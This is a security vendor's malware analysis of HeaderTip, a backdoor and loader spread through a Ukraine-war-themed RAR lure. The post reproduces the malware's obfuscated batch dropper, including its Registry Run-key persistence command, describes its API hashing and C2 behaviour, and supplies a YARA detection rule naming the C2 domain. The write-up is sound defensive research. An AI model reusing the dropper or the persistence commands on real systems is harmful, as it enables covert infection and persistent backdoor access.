eSentire Threat Intelligence Malware Analysis: HeaderTip

Since humans are still the weakest link in cybersecurity, threat actor(s) continue to prey on fallible human nature to launch cyberattacks. As the Russia-Ukraine conflict continues to impact the global economy and draw worldwide attention, these tensions create opportunities for threat actor(s) to designing campaigns to exploit human vulnerabilities and anxieties stemming from the Russia-Ukraine conflict.

HeaderTip is a malware used by threat actor(s) that are leveraging the current Russia-Ukraine conflict to spread persistent malware. eSentire Threat Intelligence assesses with high confidence that HeaderTip serves as a backdoor and a loader for threat actor(s) to further deploy rootkits, trojans, or other types of malware.

eSentire’s Threat Intelligence team has performed a technical malware analysis on HeaderTip. This technical analysis provides a breakdown of how HeaderTip achieves the persistence on the infected machine and how it obfuscates the code to evade detections.

Case Study

On March 22, 2022, the Computer Emergency Response Team of Ukraine (CERT-UA) detected the RAR-archive translated as, “The preservation of video materials on criminal actions from Russian military” from a Ukrainian organization. The malware campaign is dubbed as HeaderTip and is being tracked as UAC-0026.

CERT-UA reported that they observed similar activity in September 2020. In addition, researchers at SentinelOne have tied the malware campaign to the suspected Chinese group of threat actors known as Scarab. The Scarab malware was first observed in 2012 targeting organizations in Russia, Ukraine, United States, Chile, and Syria.

Technical Analysis on HeaderTip

The RAR archive contains an executable with the same naming convention as the archive. The executable has an embedded PDF file and is not signed. The 32-bit executable is written in C++ programming language with a file size of 653 KB.

An overview of the malicious files, domains and IPs related to HeaderTip (Exhibit 1).

The executable file contains the .RCData section with an embedded PDF file which is likely used as a bait. The PDF document contains information from the National Police of Ukraine with instructions on how to retain video evidence on criminal activities conducted by the Russian military in Ukraine so they can be used in investigations by the Criminal Investigative Division of Ukraine (Exhibits 2-3).

The metadata indicates that the PDF document was created on March 16, 2022, which is the exact date when the document was issued and signed. We assess with high confidence that the document was not forged. The document was written by a native Ukrainian speaker, based on grammatical accuracy and vocabulary.

The second resource contains the dropped .BAT file named “officecleaner.dat” with the following commands:

@echo off
set objfile=%temp%\httpshelper.dll
if not exist %objfile% (
    echo | set /p="M%fgopvhrsdfertj%Z" > %objfile%
    type %temp%\officecleaner.dat >> %objfile%
    del %temp%\officecleaner.dat
    re%ooperoitlksdfgljjdfgijtrjg%g add HK%iwejhjkhkl%CU\Software\Microsoft\Windows\C%ljljlkwjefiofljksdfha%urrentVersion\Run /v "httpshelper" /d "c:\windows\system32\run%jlkjfaewiuoqrjljretfdsg%dll32.exe %objfile%,OAService" /f
    start c:\windows\system32\rundll32.exe %objfile%,OAService
) else (
set bat="bat"
)

The command is responsible for dropping a malicious .DLL (Dynamic Link Library) file (officecleaner.dat) onto the %TEMP% folder, appends the MZ (the executable file format used for .EXE files in DOS header) to it and renames the officecleaner.dat file as httpshelper.dll. Additionally, the batch file sets up a persistence mechanism via Registry Run Keys. The officecleaner.dat file is removed from %TEMP% folder after successfully renaming itself (Exhibit 4).

The de-obfuscated command is used to add the Registry Run Key with the key name “OAService” to run the malicious httpshelper.dll file:

• reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "httpshelper" /d "c:\windows\system32\rundll32.exe httpshelper.dll,OAService" /f start c:\windows\system32\rundll32.exe httpshelper.dll,OAService

The third resource contains a .DLL file with a missing executable (MZ) header (Exhibit 5).

Upon analyzing the executable file in a disassembler, we found another value being added to the Registry Run Keys (Exhibit 6):

•  /c reg add HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v httpsrvlog /t REG_SZ /d

The added httpsrvlog key is responsible for running the officecleaner.bat file under the %TEMP% directory.

We have observed the following files being dropped onto the %TEMP% folder after the running the malicious executable:

• officecleaner.bat: the batch file responsible for persistence of the .DLL file.
• officecleaner.dat: the malicious .DLL file (before the PC reboot or execution of a batch file).
• httpshelper.dll: the malicious .DLL file (after the PC reboot or execution of a batch file)
• #2163_02_33-2022.pdf: the decoy PDF file.

Analyzing the httpshelper.dll file

The 32-bit .DLL file is written in C++ programming language. The size of the file is relatively small – 9.50 KB. Upon analyzing the file in a disassembler, we have noticed that the malware is hiding the API imports by applying the stackstrings and dynamically resolving APIs at runtime (Exhibit 7).

The malware hashes the libraries and API functions by applying ROR-13 calculation to evade detections. LoadLibraryA is used to load the Wininet library, which contains the functions that enables the application to interact with HTTP protocol in our malware sample. GetProcAddress API is used to resolve the function’s address. (Exhibit 8-9).

The malicious DLL initiates the connection to the C2 domain over port 8080, the function resides in export named OAService (Exhibit 10). The threat actor(s) is utilizing Dynamic DNS (DDNS) from ChangeIP with the hardcoded domain in the DLL sample, which means that the infected machines can connect to C2 servers using a domain name instead of IP address. This gives the threat actor(s) a huge benefit as they can change or not have to rely on IP addresses to avoid detection.

The main C2 communication function is shown in Exhibit 11. The malware creates a POST request handle, checks if the request is successfully received from the C2 server with HTTP response code 200, and reads 128 bytes of data received from C2 server by calling InternetReadFile API (Exhibit 12). It also uses the User-Agent string, Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko, for C2 communications.

We have also noticed a function containing a “Loader” string. We believe the function is responsible for loading the DLL into the memory by using VirtualAlloc API to allocate new memory regions inside the address space of a process (Exhibit 12). First, it compares if the file contains MZ header, then it loops through the first 4096 bytes of the DLL file (Exhibit 13).

What eSentire is doing about it

Our Threat Response Unit (TRU) combines threat intelligence obtained from research, security incidents, and the external threat landscape to produce actionable outcomes for our customers. We are taking a holistic response approach to combat all malware by deploying countermeasures, such as:

• Implementing two new detections to identify HeaderTip malware across eSentire MDR (Managed Detection and Response) for Endpoint solutions.
• Performing global threat hunts against the IOCs (Indicators of Compromise) and known suspicious activities associated with the HeaderTip malware.
• Actively monitoring for any signs of compromise.

Our detection content is supported by investigation runbooks, ensuring our SOC cyber analysts respond rapidly to any intrusion attempts. In addition, our Threat Response Unit closely monitors the threat landscape and addresses capability gaps and performs retroactive threat hunts to assess customer impact.

Recommendations from eSentire’s Threat Response Unit (TRU)

We recommend implementing the following controls to help secure your organization against HeaderTip malware:

• Conduct security awareness training to lower the risk of phishing threats.
• Patch any external-facing devices and applications on an ongoing basis. Conduct regular vulnerability scans to ensure your team is staying on top of identifying, and patching, all known vulnerabilities.
• Ensure your team is enforcing strong password policies for all employees as part of strengthening your organization’s overall cyber hygiene.
• Implement the Principle of Least Privilege (POLP) that requires giving each user only the permissions needed to complete their task and nothing more

While the Tactics, Techniques, and Procedures (TTPs) used by threat actor(s) grow in sophistication, they lead to a limited set of options at which critical business decisions must be made. Intercepting the various attack paths utilized by the modern threat actor requires actively monitoring the threat landscape, developing, and deploying endpoint detection, and the ability to investigate logs & network data during active intrusions.

eSentire’s Threat Response Unit (TRU) is a world-class team of threat researchers who develop new detections enriched by original threat intelligence and leverage new machine learning models that correlate multi-signal data and automate rapid response to advanced threats.

If you are not currently engaged with an MDR provider, eSentire MDR can help you reclaim the advantage and put your business ahead of disruption.

Learn what it means to have an elite team of Threat Hunters and Researchers that works for you. Connect with an eSentire Security Specialist.

Appendix

Sources

• https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/
• https://cert.gov.ua/article/38097
• https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8bfa7311-fdd9-4f8d-b813-1ab6c9d2c363&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments

Indicators of Compromise

Yara Rules

The Yara rule for the malicious DLL and the executable:

import "pe"
import "math"
rule  HeaderTip {
    meta:
        author = "eSentire TI"
        date = "03/27/2022"
        version = "1.0"
    strings:
        $string = "%016I64x%08x" wide fullword nocase 
        $user_agent = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" wide fullword nocase
        $export = "OAService"  
        $dll_name = "httpshelper.dll" 
        $c2_domain = "product2020.mrbasic.com" wide fullword nocase
    condition:
        for any i in (0..pe.number_of_sections - 1): (
            math.entropy(pe.sections[i].raw_data_offset, pe.sections[i].raw_data_size) >=6 and
            pe.sections[i].name == ".text") and
        all of them and
        (uint16(0) == 0x5A4D or uint32(0) == 0x4464c457f)        
}